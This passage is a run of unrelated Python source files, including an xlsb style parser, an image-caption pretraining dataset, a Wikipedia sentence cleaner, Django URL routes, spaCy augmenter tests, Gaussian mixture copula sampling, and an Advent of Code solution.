packet_locations[shape.first_packet + i] stream.seek(base + header.packet_offset + packet_location.offset) primitives = unpack_packet(stream, vertex_type, packet_location.size) shape.batches[i] = Batch(primitives, matrix_table, matrix_selection.unknown0) stream.seek(base + header.section_size) return shapes
498484
import os from . import recordtypes as rt from .recordreader import RecordReader from .records import FormatRecord class Format(object): __slots__ = ('code', 'is_builtin', '_is_date_format') def __init__(self, code): self.code = code self.is_builtin = False self._is_date_format = None @property def is_date_format(self): if self._is_date_format is None: self._is_date_format = False if self.code is not None: # TODO Implement an actual parser in_color = 0 for c in self.code: if c == '[': in_color += 1 elif c == ']' and in_color > 0: in_color -= 1 elif in_color > 0: continue elif c in ('y', 'm', 'd', 'h', 's'): self._is_date_format = True break return self._is_date_format def __repr__(self): return 'Format(code={}, is_builtin={})' \ .format(self.code, self.is_builtin) class BuiltinFormat(Format): __slots__ = () def __init__(self, *args, **kwargs): super(BuiltinFormat, self).__init__(*args, **kwargs) self.is_builtin = True class Styles(object): _general_format = BuiltinFormat(None) # See: ISO/IEC29500-1:2016 section 18.8.30 _builtin_formats = { 1: BuiltinFormat('0'), 2: BuiltinFormat('0.00'), 3: BuiltinFormat('#,##0'), 4: BuiltinFormat('#,##0.00'), 9: BuiltinFormat('0%'), 10: BuiltinFormat('0.00%'), 11: BuiltinFormat('0.00E+00'), 12: BuiltinFormat('# ?/?'), 13: BuiltinFormat('# ??/??'), 14: BuiltinFormat('mm-dd-yy'), 15: BuiltinFormat('d-mmm-yy'), 16: BuiltinFormat('d-mmm'), 17: BuiltinFormat('mmm-yy'), 18: BuiltinFormat('h:mm AM/PM'), 19: BuiltinFormat('h:mm:ss AM/PM'), 20: BuiltinFormat('h:mm'), 21: BuiltinFormat('h:mm:ss'), 22: BuiltinFormat('m/d/yy h:mm'), 37: BuiltinFormat('#,##0;(#,##0)'), 38: BuiltinFormat('#,##0;[Red](#,##0)'), 39: BuiltinFormat('#,##0.00;(#,##0.00)'), 40: BuiltinFormat('#,##0.00;[Red](#,##0.00)'), 45: BuiltinFormat('mm:ss'), 46: BuiltinFormat('[h]:mm:ss'), 47: BuiltinFormat('mmss.0'), 48: BuiltinFormat('##0.0E+0'), 49: BuiltinFormat('@') } def __init__(self, fp): self._fp = fp self._parse() def __enter__(self): return self def __exit__(self, type, value, traceback): self.close() def _parse(self): self._formats = dict() self._cell_style_xfs = list() self._cell_xfs = list() self._fp.seek(0, os.SEEK_SET) reader = RecordReader(self._fp) for rectype, rec in reader: if rectype == rt.FMT: self._formats[rec.fmtId] = Format(rec.fmtCode) elif rectype == rt.BEGIN_CELL_STYLE_XFS: self._cell_style_xfs = [None] * rec.count i = 0 for rectype, rec in reader: if rectype == rt.XF: self._cell_style_xfs[i] = rec i += 1 elif rectype == rt.END_CELL_STYLE_XFS: break elif rectype == rt.BEGIN_CELL_XFS: self._cell_xfs = [None] * rec.count i = 0 for rectype, rec in reader: if rectype == rt.XF: self._cell_xfs[i] = rec i += 1 elif rectype == rt.END_CELL_XFS: break elif rectype == rt.END_STYLE_SHEET: break def get_style(self, idx): # TODO del idx def _get_format(self, idx): if idx < len(self._cell_xfs): fmt_id = self._cell_xfs[idx].numFmtId if fmt_id in self._formats: return self._formats[fmt_id] elif fmt_id in self._builtin_formats: return self._builtin_formats[fmt_id] return self._general_format def close(self): self._fp.close()
498543
import json import os import random from torch.utils.data import Dataset from PIL import Image from PIL import ImageFile ImageFile.LOAD_TRUNCATED_IMAGES = True Image.MAX_IMAGE_PIXELS = None from data.utils import pre_caption import os,glob class pretrain_dataset(Dataset): def __init__(self, ann_file, laion_path, transform): self.ann_pretrain = [] for f in ann_file: print('loading '+f) ann = json.load(open(f,'r')) self.ann_pretrain += ann self.laion_path = laion_path if self.laion_path: self.laion_files = glob.glob(os.path.join(laion_path,'*.json')) print('loading '+self.laion_files[0]) with open(self.laion_files[0],'r') as f: self.ann_laion = json.load(f) self.annotation = self.ann_pretrain + self.ann_laion else: self.annotation = self.ann_pretrain self.transform = transform def reload_laion(self, epoch): n = epoch%len(self.laion_files) print('loading '+self.laion_files[n]) with open(self.laion_files[n],'r') as f: self.ann_laion = json.load(f) self.annotation = self.ann_pretrain + self.ann_laion def __len__(self): return len(self.annotation) def __getitem__(self, index): ann = self.annotation[index] image = Image.open(ann['image']).convert('RGB') image = self.transform(image) caption = pre_caption(ann['caption'],30) return image, caption
498547
class AmazonEvalF(object): PROD_ID = 'prod_id' CAT = 'cat' REV1 = 'rev1' REV2 = 'rev2' REV3 = 'rev3' REV4 = 'rev4' REV5 = 'rev5' REV6 = 'rev6' REV7 = 'rev7' REV8 = 'rev8' SUMM1 = 'summ1' SUMM2 = 'summ2' SUMM3 = 'summ3' REVS = [REV1, REV2, REV3, REV4, REV5, REV6, REV7, REV8]
498566
import re """ Load all cleaned text files from wikipedia and convert them to clean line by line sentences text. """ # based histogram of an output, 50 time step for LSTM would be good! #input location of text files input_file = 'data/raw.en/englishText_' # output location output_file = 'data/wiki_sentences' # refere to first file in input location start_file_index = 0 # step size in the name of text file step = 10000 # Token to replace all integers inside the text dig_token = "$DGT$" # pattern to find the digit numbers dig_pattern = r'\b[0-9]*\.*[0-9]+\b' # loop over all text 154 files for i in range(0, 154): # hold text to write to new file data = "" # concatenate file name with step size input_filename = input_file + str(start_file_index) + '_' + str(start_file_index + step) # output filename output_filename = output_file + str(i) + '.txt' # increase start_file_index for next loop start_file_index += step print("reading: " + input_filename) with open(input_filename, mode="r", encoding="latin-1") as f: # lines here are paragraphs in Wikipedia for line in f: line = " ".join(line.split()) words = line.split(' ') # if this paragraph is shorter than 10 words, go to next paragraph if len(words) < 10: continue # remove <doc id... produced by WikiExtractor if words[0] == '<doc': continue # divide paragraph to sentences pattern = '(\w\w..\.\ )' indexes = re.finditer(pattern, line) line = list(line) for j in indexes: m = j.span() line[m[1]-1] = '\n' line = ''.join(line) # replace digits with $DGT$ line = re.sub(dig_pattern, dig_token, line) data += line + '\n' out_file = open(output_filename, mode="w") out_file.write(data) out_file.close()
498568
import pytest from httpx import AsyncClient from main import app from dotenv import load_dotenv from services.helpers.alena import cleaning_service from pathlib import Path import os import sys load_dotenv() headers = { 'Authorization': 'Bearer {}'.format(os.environ.get('FILE_MANAGER_BEARER_TOKEN')) } _ORIGINAL_IMAGE = open('api/app/static/pictures/original/dcb8ac79618540688ea36e688a8c3635.png', 'rb') _ORIGINAL_IMAGE_NAME = 'dcb8ac79618540688ea36e688a8c3635.png' @pytest.mark.asyncio async def test_root(): params = {'cpu_load': 'True'} async with AsyncClient(app=app, base_url=os.environ.get('API_URL'), headers=headers, params=params) as ac: response = await ac.get("/") if params.get('cpu_load') != 'True': assert response.json() == {"Hello": "Token is True"} assert response.status_code == 200 @pytest.mark.asyncio async def test_upload_image_file(): params = {'thumbnail': 'True'} image_file = {'file': (_ORIGINAL_IMAGE_NAME, _ORIGINAL_IMAGE, 'image/png')} async with AsyncClient(app=app, base_url=os.environ.get('API_URL'), headers=headers, params=params) as ac: response = await ac.post("/image", files=image_file) assert response.status_code == 200 imagePaths = { 'original' : response.json().get('thumbnail').split('/')[len(response.json().get('thumbnail').split('/')) - 1].split('.')[0] + '.png', 'thumbnail' : response.json().get('thumbnail').split('/')[len(response.json().get('thumbnail').split('/')) - 1] } assert Path(os.environ.get('IMAGE_THUMBNAIL_LOCAL_PATH') + '/' +imagePaths['thumbnail']).is_file() == True cleaning_service(imagePaths, images = True)
498592
import json import os # Change the "report_elements" array in the config.json file # input is an array, for exemple : ["facebook", "twitter"] def modules_update(self, modules): new_config = self.CONFIG new_config["report_elements"] = modules try: with open(self.CONFIG["config_path"], 'w') as fp: json.dump(new_config, fp, indent=4) except Exception as e: print(e) # Remove modules that do not exist def get_report_modules(self): return list( set(self.CONFIG["report_elements"]) & set(list(self.CONFIG["plateform"].keys())) )
498605
from django.conf.urls import url, include from nimbus.apps import debug_urls from . import views urlpatterns = debug_urls() urlpatterns += [ url(r"^$", views.api_root, name="api_root"), url(r'^api-auth/', include('rest_framework.urls', namespace='rest_framework')), url(r'^api-token-auth$', 'rest_framework.authtoken.views.obtain_auth_token'), url(r"^media/list$", views.MediaList.as_view(), name="media_list"), url(r"^media/show$", views.MediaDetail.as_view(), name="media_detail"), url(r"^media/add_file$", views.AddFile.as_view(), name="add_file"), url(r"^media/add_link$", views.AddLink.as_view(), name="add_link"), url(r"^media/delete$", views.delete_media, name="delete_media"), ]
498643
from dacy.augmenters import ( create_char_swap_augmenter, create_spacing_augmenter, create_char_random_augmenter, create_char_replace_augmenter, ) from spacy.lang.da import Danish from spacy.training import Example def test_create_char_swap_augmenter(): aug = create_char_swap_augmenter(doc_level=1, char_level=1) nlp = Danish() doc = nlp("qw") example = Example(doc, doc) examples = aug(nlp, example) example_aug = next(examples) assert example_aug.x.text == "wq" def test_create_spacing_augmenter(): aug = create_spacing_augmenter(doc_level=1, spacing_level=1) nlp = Danish() doc = nlp("en sætning.") example = Example(doc, doc) examples = aug(nlp, example) example_aug = next(examples) assert example_aug.x.text == "ensætning." def test_create_char_random_augmenter(): aug = create_char_random_augmenter(doc_level=1, char_level=1) nlp = Danish() doc = nlp("en sætning.") example = Example(doc, doc) examples = aug(nlp, example) example_aug = next(examples) assert example_aug.x.text != "en sætning." def test_create_char_replace_augmenter(): aug = create_char_replace_augmenter( doc_level=1, char_level=1, replacement={"q": ["a", "b"]} ) nlp = Danish() doc = nlp("q w") example = Example(doc, doc) examples = aug(nlp, example) example_aug = next(examples) assert example_aug.x[0].text in ["a", "b"] assert example_aug.x[1].text == "w"
498647
import numpy as np from numpy.random import choice from scipy.stats import multivariate_normal as mvn from .marginals import gmm_marginal_cdf from .parameter import GMCParam __all__ = ['random_gmcm'] def random_gmcm(n: int, param: GMCParam): """ Generates random variables from a Gaussian Mixture Copula Model Parameters ---------- n : int The number of instances to generate param : GMCParam The Gaussian Mixture Copula parameter Returns ------- np.ndarray An array of random variables """ z = random_gmm(n, param) # latent realizations from Gaussian mixture model return gmm_marginal_cdf(z, param) def random_gmm(n: int, param: GMCParam): """Generates random variables from a Gaussian Mixture Model""" output = np.empty((n, param.n_dim)) order = choice(range(param.n_clusters), n, p=param.prob) for i in range(param.n_clusters): k = sum(order == i) output[order == i] = mvn.rvs(param.means[i], cov=param.covs[i], size=k) return output
498665
import re import numpy as np from tool.runners.python import SubmissionPy class SilvestreSubmission(SubmissionPy): def parse(self, s): # "#1400 @ 873,28: 11x27" rec = re.compile(r"^#(\d+) @ (\d+),(\d+): (\d+)x(\d+)$") rectangles = [rec.match(row) for row in s.splitlines()] rectangles = [tuple(map(int, m.groups())) for m in rectangles] return rectangles def run(self, s): # :param s: input in string format # :return: solution flag # Your code goes here rectangles = self.parse(s) # list of (id, x, y, width, height) array = np.zeros((1000, 1000), dtype=np.uint) for (_, x, y, width, height) in rectangles: array[x:x+width, y:y+height] += 1 return np.sum(array >= 2)
498831
from unittest import TestCase from app.templating.summary.answer import Answer class TestAnswer(TestCase): def test_create_answer(self): # Given answer_schema = {'id': 'answer-id', 'label': 'Answer Label', 'type': 'date'} user_answer = 'An answer' # When answer = Answer(answer_schema, user_answer, 2) # Then self.assertEqual(answer.id, 'answer-id-2') self.assertEqual(answer.label, 'Answer Label') self.assertEqual(answer.value, user_answer) def test_date_answer_type(self): # Given answer_schema = {'id': 'answer-id', 'label': '', 'type': 'date'} user_answer = None # When answer = Answer(answer_schema, user_answer, 0) # Then self.assertEqual(answer.type, 'date')